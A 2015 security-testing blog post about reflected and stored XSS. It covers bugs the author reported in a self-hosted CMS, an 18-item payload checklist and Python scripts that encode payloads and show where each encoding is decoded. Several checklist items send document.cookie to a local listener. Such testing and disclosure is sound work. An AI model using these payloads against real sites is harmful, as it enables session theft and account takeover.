Monday, May 11, 2015

XSS Reflected and Stored Testing with Script to Encode HTML

I was testing various methods of XSS, and from the list below I found some that would work and some that would not.  Most of them in the list below I tested on an installed instance of "CMS Made Simple" on an Apache server I set up.

After testing for XSS on the instance I had installed, I submitted bugs #10511, #10512, #10513, #10514, #10515, #10517, #10518, #10519, and #10520 to them.  They felt most of the bugs were trivial because they occurred after an admin had accessed the CMS.  The one stored XSS that I found was in a comment, as described in the documentation I provided them.

I used the OWASP XSS Filter Evasion Cheat Sheet and The Web Application Hacker's Handbook, 2nd edition, to generate the following list:

### XSS Manual Testing Checklist ###
1. <script>alert('XSS');</script>
2. <script>alert("XSS");</script>
3. <script type='text/javascript'>alert('XSS');</script>
4. <script type="text/javascript">alert("XSS");</script>
5. %3cscript>alert("XSS");%3c/script>
6. &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
7. &#0000060;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000062;&#0000097;&#0000108;&#0000101;&#0000114;&#0000116;&#0000040;&#0000049;&#0000041;&#0000060;&#0000047;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000062;
8. <script>alert(1)</script>
9. &#0000060&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000062&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000049&#0000041&#0000060&#0000047&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000062
10. %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
11. <script>var+i=new+Image;+i.src='http://127.0.0.1:8095/test.html?'%2bdocument.cookie;</script>
12. <script>var+i=new+Image;+i.src="http://127.0.0.1:8095/test.html";i+=document.cookie;</script>
13. <a href="#" onclick="window.location='http://127.0.0.1:8095/stole.cgitext='+escape(document.cookie);return false;">Click here!</a>
14. <script>var+i=new Image;+i.src="http://127.0.0.1:8095/test.html?"%2bencodeURIComponent(document.cookie);</script>
15. <script>var%2bi=new%20Image;%2bi.src="http://127.0.0.1:8095/test.html?"%2bencodeURIComponent(document.cookie);</script>
16. <script type="text/javascript">alert(document.cookie);</script>
17. <script type="text/javascript">document.write('http://127.0.0.1:8095/test.html?'+document.cookie);</script>
18. <script type="text/javascript">document.write('<img src=http://127.0.0.1:8095/test.html?'+document.cookie+'>');</script>

To generate items 6 through 10 I wrote the following Python 2 script, which reads a string and prints it as HTML decimal character references (plain, zero-padded to seven digits with semicolons, and zero-padded without semicolons) and as URL percent-encoding.  Note that the script's "Hex Encoding" output is URL percent-encoding (item 10), not HTML hexadecimal character references such as &#x3c;.  The two families are decoded at different points and are not interchangeable: percent-encoding is undone by the web server when the value arrives in a query string, so items 5 and 10 only matter against a filter that runs before URL decoding (or a server that decodes twice); character references are undone by the browser's HTML parser, so items 6, 7 and 9 render as literal angle brackets when reflected into the page body and only execute where the decoded value is then interpreted as a URL or script, for example inside an href or event-handler attribute.  In items 11 through 15, + stands for a space and %2b for a literal plus sign because those payloads are meant to be sent as a URL query parameter.

#!/usr/bin/python
# Python 2: encode a string four ways for the XSS checklist above.

print "Input below the string to encode in HTML Decimal: "
valueInput = raw_input("> ")

valueOutDec = ''          # &#60;       HTML decimal character references
valueOutDecLongSemi = ''  # &#0000060;  zero-padded to seven digits
valueOutDecLong = ''      # &#0000060   zero-padded, no semicolon
valueOutHex = ''          # %3c         URL percent-encoding, one %xx per byte

# <script>alert(String.fromCharCode(88,83,83));</script>  # If URL Encoded works
# <script>alert('XSS');</script> # If URL Encoded works

for char in valueInput:
    code = ord(char)
    # HTML Decimal Encoding
    valueOutDec += "&#" + str(code) + ";"
    # HTML Decimal Encoding Long with and without semi-colon:
    # zfill pads every code point to seven digits, including single-digit
    # ones such as tab (9), which the original length check missed
    padded = str(code).zfill(7)
    valueOutDecLongSemi += "&#" + padded + ";"
    valueOutDecLong += "&#" + padded
    # Hex Encoding (URL percent-encoding); always two hex digits per byte
    valueOutHex += "%" + format(code, '02x')

print
print "HTML Decimal Encoding"
print valueOutDec
print
print "HTML Decimal Encoding Long with semi-colon"
print valueOutDecLongSemi
print
print "HTML Decimal Encoding Long"
print valueOutDecLong
print
print "Hex Encoding with leading %"
print valueOutHex
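The script above only produces the encodings; it does not show where each one is decoded.  As an added example (not the post's code), the Python 3 program below builds the same variants for the checklist's probe and then simulates the two decoding stages: urllib.parse.unquote_plus stands in for the web server's query-string decoding, and the standard library's html.parser stands in for the browser's HTML parser (an approximation, not a real browser engine).  It shows that items 6, 7 and 9 survive only inside an attribute value, that item 10 is undone by URL decoding alone, and why items 11 through 15 write spaces as + and literal plus signs as %2b.  The function names, the TagCollector class and the choice of an href attribute as the attribute context are this example's assumptions.

```python
#!/usr/bin/env python3
"""Added example, not the original post's script: build the encoded
variants from the checklist with the Python 3 standard library and show
which decoding stage (server-side URL decoding or the browser's HTML
parser) turns each one back into the raw probe."""
import html  # noqa: F401  (html.parser below uses the same unescape rules)
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Same probe the checklist encodes in items 6 through 10.
PROBE = "<script>alert(1)</script>"

# Item 11 from the checklist, exactly as it would be typed into a URL.
ITEM_11 = ("<script>var+i=new+Image;+i.src='http://127.0.0.1:8095/test.html?'"
           "%2bdocument.cookie;</script>")


def html_decimal(s, width=0, semicolon=True):
    """HTML decimal character references.  width > 0 zero-pads the code
    point (the checklist's 'long' form); semicolon=False drops the ';'."""
    end = ";" if semicolon else ""
    return "".join("&#" + str(ord(c)).zfill(width) + end for c in s)


def url_percent(s):
    """Percent-encode every byte, including ones urllib.parse.quote leaves alone."""
    return "".join("%%%02x" % b for b in s.encode("utf-8"))


def server_sees(query_value):
    """One round of query-string decoding, as a web framework performs it:
    %xx becomes the byte and '+' becomes a space, which is why the checklist
    writes a literal plus sign as %2b."""
    return unquote_plus(query_value)


class TagCollector(HTMLParser):
    """Record the start tags and attribute values the parser produces."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attr_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attr_values.extend(v for _, v in attrs if v is not None)


def script_tag_in_body(payload):
    """True if the payload reflected into body text yields a <script> tag.
    Character references in text become literal characters, never markup."""
    p = TagCollector()
    p.feed("<p>" + payload + "</p>")
    p.close()
    return "script" in p.tags


def attribute_value_after_parse(payload):
    """The string a browser hands to the URL or script engine when the
    payload lands inside a quoted attribute: references are decoded first."""
    p = TagCollector()
    p.feed('<a href="' + payload + '">x</a>')
    p.close()
    return p.attr_values[0]


def variants(probe=PROBE):
    """The checklist's encoded forms of the probe, keyed by item number."""
    return {
        "item 6  html decimal": html_decimal(probe),
        "item 7  html decimal, 7 digits": html_decimal(probe, width=7),
        "item 9  html decimal, 7 digits, no ';'": html_decimal(probe, 7, False),
        "item 10 url percent": url_percent(probe),
    }


if __name__ == "__main__":
    for name, enc in variants().items():
        print(name)
        print("  encoded:               ", enc)
        print("  probe after URL decode:", server_sees(enc) == PROBE)
        print("  <script> tag in body:  ", script_tag_in_body(enc))
        print("  probe inside attribute:", attribute_value_after_parse(enc) == PROBE)
    print("item 11 as the server sees it:", server_sees(ITEM_11))
```

Running it prints one block per variant; the raw probe itself (not listed) is the only input for which script_tag_in_body is true, while the character-reference variants come back as the raw probe only from the attribute context.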
